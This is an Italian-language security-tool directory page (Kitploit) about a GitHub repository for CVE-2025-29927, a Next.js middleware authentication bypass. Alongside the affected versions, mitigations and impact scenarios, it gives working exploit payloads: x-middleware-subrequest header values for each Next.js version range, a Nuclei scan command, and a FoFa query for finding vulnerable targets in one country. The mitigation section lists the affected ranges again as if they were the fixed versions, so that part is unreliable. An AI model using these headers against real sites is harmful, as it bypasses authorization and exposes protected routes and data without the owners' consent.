Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/kh4sh3i/cve-2025-29927
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: Vulnerabilità di bypass del middleware di Next.js

Vedi Repository
241 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi



CVE-2025-29927

CVE-2025-29927: Vulnerabilità di bypass del middleware in Next.js Questo repository dimostra la vulnerabilità CVE-2025-29927 in Next.js in cui l'header interno x-middleware-subrequest può essere utilizzato per bypassare i controlli del middleware come l'autenticazione.

Versioni interessate

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

Mitigazione e rimedio

  • Aggiorna Next.js alle versioni corrette:
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • Se l'aggiornamento non è immediatamente possibile, blocca o rimuovi l'header x-middleware-subrequest a livello di web server o proxy:

Scenari di impatto

  • Bypass dell'autorizzazione: gli attaccanti possono accedere a rotte protette senza una corretta autenticazione o autorizzazione.
  • Bypass della Content Security Policy (CSP): se le intestazioni CSP vengono aggiunte tramite middleware, gli attaccanti possono aggirare questi controlli di sicurezza, consentendo potenzialmente attacchi di cross-site scripting (XSS).
  • Denial of Service tramite cache poisoning: in alcune configurazioni, gli attaccanti potrebbero avvelenare le cache con contenuti non autorizzati bypassando il middleware che imposta le intestazioni di controllo della cache.

Utilizzo del template Nuclei nextjs-CVE-2025-29927

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

Sfruttamento nelle diverse versioni di Next.js

  • Per le versioni precedenti alla 12.2:
root@kitploit:~
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • Per le versioni 12.2 e successive:
root@kitploit:~
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • Per le versioni 13.2.0 e successive:
root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

Caccia ai target con FoFa

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

CTF gratuito per questo

  • CTF
Scarica lo strumento